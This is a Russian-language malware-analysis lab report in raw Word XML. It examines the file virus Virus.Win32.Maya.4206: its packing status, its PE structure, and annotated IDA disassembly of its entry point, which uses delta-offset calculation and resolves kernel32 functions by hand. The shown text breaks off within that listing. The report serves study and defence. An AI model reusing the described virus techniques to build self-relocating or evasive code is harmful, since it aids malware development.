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2C05439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8607E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0779D98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38607E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75994550" w14:textId="441836D8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D74C35">
        <w:t xml:space="preserve">Анализ вируса </w:t>
      </w:r>
      <w:r w:rsidR="00D74C35">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Virus</w:t>
      </w:r>
      <w:r w:rsidR="00D74C35" w:rsidRPr="00C26132">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00D74C35">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Maya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626E8AD1" w:rsidR="000C130F" w:rsidRDefault="00C26132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E6EC4C1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C26132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5A7EF6CE" w:rsidR="000C130F" w:rsidRDefault="000C130F" w:rsidP="000C7726">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5985A7AC" w14:textId="53CF1CBE" w:rsidR="000C7726" w:rsidRDefault="000C130F" w:rsidP="000C7726">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="008957CB">
        <w:t>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10120345" w14:textId="23F945DC" w:rsidR="006A0CE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5414023" w:history="1">
            <w:r w:rsidR="006A0CEF" w:rsidRPr="009A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Введение</w:t>
            </w:r>
            <w:r w:rsidR="006A0CEF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006A0CEF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006A0CEF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215414023 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006A0CEF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006A0CEF"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5</w:t>
            </w:r>
            <w:r w:rsidR="006A0CEF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E1419C1" w14:textId="3D0BAD22" w:rsidR="006A0CEF" w:rsidRDefault="006A0CE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24" w:history="1">
            <w:r w:rsidRPr="009A3C91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</w:rPr>
              <w:t>Распаковка вируса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B09F" w14:textId="385AE024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25" w:history="1">
            <w:r w:rsidRPr="009A3C91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</w:rPr>
              <w:t>Отсутсвие упаковки – детальный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07D62" w14:textId="1AB62674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26" w:history="1">
            <w:r w:rsidRPr="009A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="major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</w:rPr>
              <w:t xml:space="preserve">Проеврка структуры </w:t>
            </w:r>
            <w:r w:rsidRPr="009A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PE</w:t>
            </w:r>
            <w:r w:rsidRPr="009A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-файла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E639" w14:textId="3BBD397D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27" w:history="1">
            <w:r w:rsidRPr="009A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="major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</w:rPr>
              <w:t>Анализ точки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1FCE" w14:textId="48C15A7F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28" w:history="1">
            <w:r w:rsidRPr="009A3C91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</w:rPr>
              <w:t>Обфускация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E87F" w14:textId="386B789A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29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Вычисление базового адреса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0EA1" w14:textId="7839E35F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0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Вставка мусорных инструкций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FCB3" w14:textId="7A75CDE3" w:rsidR="006A0CEF" w:rsidRDefault="006A0CE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1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Скрытие от обнаружения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1A11" w14:textId="06AA0675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2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Обфускация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0379" w14:textId="2D5B39AD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3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Детальный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2693" w14:textId="35504C61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4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 xml:space="preserve">Проверка системного времени в </w:t>
            </w:r>
            <w:r w:rsidRPr="009A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>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CBA5" w14:textId="5B80A396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5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Техники обхода песочниц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1E55" w14:textId="22A9EE75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6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Сетевая активность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6EDC" w14:textId="34560AB6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7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Удаление следов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A872" w14:textId="014B9A4D" w:rsidR="006A0CEF" w:rsidRDefault="006A0CE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8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Полезная нагрузка вируса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CB92" w14:textId="445BFF3B" w:rsidR="006A0CEF" w:rsidRDefault="006A0CE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39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Изменение обоев и отображение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8CAE" w14:textId="01E53CCE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0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Условия активации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A1F0" w14:textId="702311C2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1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Динамическая загрузка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A4CE7" w14:textId="56DD4032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2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Получение адресов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51627" w14:textId="46A2A00E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3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Создаение файла обоев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C702" w14:textId="0E204250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4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Применение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86D8" w14:textId="4563A97E" w:rsidR="006A0CEF" w:rsidRDefault="006A0CE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5" w:history="1">
            <w:r w:rsidRPr="009A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>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A3C91">
              <w:rPr>
                <w:rStyle w:val="af5"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Отображение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F49E" w14:textId="5041466A" w:rsidR="006A0CEF" w:rsidRDefault="006A0CE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6" w:history="1">
            <w:r w:rsidRPr="009A3C91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3DAB" w14:textId="2888512D" w:rsidR="006A0CEF" w:rsidRDefault="006A0CE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14047" w:history="1">
            <w:r w:rsidRPr="009A3C91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7C8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3E3EB518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5414023"/>
      <w:r w:rsidRPr="004B5D52">
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6492F12E" w14:textId="7FDFFF3B" w:rsidR="00856943" w:rsidRDefault="00D80D5C" w:rsidP="00856943">
      <w:r>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidR="001B06D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00856943">
        <w:t>Целью данной лабораторной работы является анализ техник обфускации и скрытия, используемых вирусом Virus.Win32.Maya.4206, а также изучение его полезной нагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069B82A7" w14:textId="1A90C245" w:rsidR="00A3081B" w:rsidRDefault="00856943" w:rsidP="00856943">
      <w:r>
        <w:t>Работа направлена на понимание методов, применяемых вредоносным программным обеспечением для усложнения анализа и обхода систем защиты, а также на изучение функциональности вируса и его воздействия на систему.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB656AA" w14:textId="77777777" w:rsidR="00856943" w:rsidRDefault="00856943" w:rsidP="00856943">
      <w:r>
        <w:t>ИНСТРУМЕНТЫ АНАЛИЗА:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C77ABD" w14:textId="1E3108BB" w:rsidR="00856943" w:rsidRDefault="00856943" w:rsidP="00856943">
      <w:r>
        <w:t>- IDA Pro 7.7 (Interactive Disassembler) - основной инструмент для статического анализа кода и дизассемблирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC7F65" w14:textId="77777777" w:rsidR="00856943" w:rsidRDefault="00856943" w:rsidP="00856943">
      <w:r>
        <w:t>- x64dbg - отладчик для динамического анализа и пошагового выполнения кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F70449F" w14:textId="77777777" w:rsidR="00856943" w:rsidRDefault="00856943" w:rsidP="00856943">
      <w:r>
        <w:t>- PEiD - инструмент для определения типа упаковщика и компилятора</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21055637" w14:textId="77777777" w:rsidR="00856943" w:rsidRDefault="00856943" w:rsidP="00856943">
      <w:r>
        <w:t>- OllyDbg - альтернативный отладчик для анализа поведения программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E8376" w14:textId="64C93646" w:rsidR="00856943" w:rsidRDefault="00856943" w:rsidP="00856943">
      <w:r>
        <w:t>- Process Monitor - инструмент для мониторинга системных вызовов и операций с файлами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF70CFB" w14:textId="2EBEBB52" w:rsidR="00D80D5C" w:rsidRDefault="005142ED" w:rsidP="000C7726">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc215414024"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Распаковка вируса</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4536B438" w14:textId="79AEE477" w:rsidR="005142ED" w:rsidRPr="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r w:rsidRPr="005142ED">
        <w:t>Первый и самый важный этап анализа любого вредоносного программного обеспечения -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>это определение наличия упаковщика или обфускатора. Упаковщики сжимают и шифруют</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>код, что значительно усложняет статический анализ. Современные упаковщики, такие</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>как UPX, ASPack, VMProtect или Themida, используют сложные алгоритмы сжатия и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>шифрования, которые требуют специальных техник распаковки, включая создание дампа</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>процесса во время выполнения или динамический анализ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F6652" w14:textId="1BB795D8" w:rsidR="005142ED" w:rsidRPr="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r w:rsidRPr="005142ED">
        <w:t>Однако при детальном анализе вируса Virus.Win32.Maya.4206 было обнаружено, что</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>вирус НЕ использует упаковщик. Это значительно упрощает процесс анализа, так как</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>весь код вируса доступен для статического изучения непосредственно в IDA Pro без</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>необходимости выполнения сложных процедур распаковки или создания дампа процесса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005142ED">
        <w:t>во время выполнения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0182A826" w14:textId="143F345A" w:rsidR="00DD2537" w:rsidRDefault="005142ED" w:rsidP="00DD2537">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc215414025"/>
      <w:r>
        <w:t>Отсутсвие упаковки – детальный анализ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="37085D02" w14:textId="1A94089F" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r w:rsidRPr="005142ED">
        <w:t>Для подтверждения отсутствия упаковщика было проведено несколько проверок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D730A7" w14:textId="4B10032C" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc215414026"/>
      <w:r>
        <w:t xml:space="preserve">Проеврка структуры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:t>-файла</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="45B02E79" w14:textId="77777777" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>Первым шагом является анализ структуры PE-файла (Portable Executable) вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3B88B" w14:textId="77777777" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>Упакованные файлы обычно имеют характерные признаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB6525" w14:textId="77777777" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Большой размер секции данных (.data) по сравнению с секцией кода (.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963FC36" w14:textId="77777777" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Необычные имена секций (например, UPX0, UPX1, .packed, .encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCF46D5" w14:textId="77777777" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Высокое соотношение размера файла к размеру секций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7824E471" w14:textId="1B8119D7" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Подозрительные разрешения секций (например, секция данных с правами выполнения)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5CB312" w14:textId="77777777" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>При анализе вируса Maya в IDA Pro было обнаружено, что:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114E824C" w14:textId="77777777" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Секция кода (.text) имеет стандартное имя и структуру</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD91F7" w14:textId="55ACD708" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Размер секции кода (0x106Eh байт = 4206 байт) соответствует реальному размеру вирусного кода, видимого в дизассемблере</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26D7C2" w14:textId="269AE960" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Разрешения секции: Read/Write/Execute (E0000020h), что является нормальным для самомодифицирующегося кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D4C180" w14:textId="69300B22" w:rsidR="005142ED" w:rsidRDefault="005142ED" w:rsidP="005142ED">
      <w:r>
        <w:t>- Отношение размера виртуальной памяти к размеру файла не указывает на сжатие</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1D4FC" w14:textId="77777777" w:rsidR="008A5999" w:rsidRPr="005142ED" w:rsidRDefault="008A5999" w:rsidP="005142ED"/>
    <w:p w14:paraId="3687624D" w14:textId="0D826901" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc215414027"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Анализ точки входа</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7AB6560B" w14:textId="3F09A4B2" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:right="141"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>Точка входа (Entry Point) упакованных файлов обычно содержит код распаковки,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:t>который расшифровывает и распаковывает основной код перед его выполнением. Такой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:t>код обычно имеет характерные признаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400FEE8A" w14:textId="4C25B9A4" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:right="141"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>- Большой цикл копирования данных (часто использует инструкции MOV, REP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:t>MOVSB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3EF86D" w14:textId="77777777" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:left="709" w:right="141" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>- Вызовы функций для выделения памяти (VirtualAlloc, HeapAlloc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CD54B4" w14:textId="77777777" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:left="709" w:right="141" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>- Использование криптографических функций или XOR-шифрования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30372E78" w14:textId="77777777" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:left="709" w:right="141" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>- Вызов CreateFile для чтения дополнительных данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFE8A75" w14:textId="77777777" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:left="709" w:right="141" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>- Переход к распакованному коду через CALL или JMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE9973" w14:textId="77777777" w:rsidR="008A5999" w:rsidRPr="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:left="709" w:right="141" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>Адрес точки входа вируса Maya: 0x00401000 (функция start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B747392" w14:textId="38B19A22" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:ind w:left="709" w:right="141" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:t>Код из lst файла (строки 40-109):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AE2195" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401000 start           proc near</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B33BD" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401000                 push    ebp                      ; Сохранить предыдущий базовый указатель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0C8EA2" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401001                 call    $+5                      ; Получить текущий адрес (EIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8C6CD" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; Инструкция call $+5 помещает адрес следующей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427F7A2B" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; инструкции (0x00401006) в стек, так как $ означает</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7E9957" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; текущий адрес, а +5 указывает на следующую инструкцию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD70A7" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401006 loc_401006:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32678C89" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401006                 pop     ebp                      ; Извлечь адрес из стека в EBP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498743C1" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; Теперь EBP содержит 0x00401006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F10BD" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401007                 mov     ebx, ebp                 ; Сохранить текущий адрес в EBX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F720365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 xml:space="preserve">CODE:00401009                 sub     ebp, offset loc_401006   ; </w:t>
      </w:r>
      <w:r>
        <w:t>Вычисление</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> delta offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F90047" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r>
        <w:t>; EBP = 0x00401006 - 0x00401006 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528C5B50" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; Это означает, что код выполняется по ожидаемому адресу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D97FCC1" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:0040100F loc_40100F:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC85924" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:0040100F                 mov     eax, 1000h               ; Загрузить значение 0x1000 (4096)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310C2F8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CODE:00401014                 add     eax, 6                    ; EAX = 0x1006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65149EE6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CODE:00401017                 sub     ebx, eax                  ; EBX = 0x00401006 - 0x1006 = 0x00400000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6320D2AA" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5999">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r>
        <w:t>; Это вычисление реального Image Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3EC049" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401019                 mov     ss:ImageBase[ebp], ebx    ; Сохранить реальный Image Base в глобальной переменной</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63AC60" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; Это значение будет использоваться для вычисления</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D8C274" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; адресов глобальных переменных и функций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA8C56A" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CODE:0040101F                 mov     edx, offset aGetmodulehandl ; Загрузить смещение строки "GetModuleHandleA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA5537" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401024                 add     edx, ebp                  ; Вычислить реальный адрес строки (с учетом delta offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593F36D" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401026                 mov     ecx, ss:dword_401BE6[ebp] ; Загрузить длину строки функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE6B46" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:0040102D                 call    FindFuncInKernel32dll    ; Найти адрес функции GetModuleHandleA в kernel32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50962BA1" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                               ; Эта функция используется для ручного восстановления IAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14991B" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
        <w:t>CODE:00401032                 pop     ebp                       ; Восстановить предыдущий базовый указатель</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D425D94" w14:textId="77777777" w:rsidR="008A5999" w:rsidRDefault="008A5999" w:rsidP="008A5999">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r>
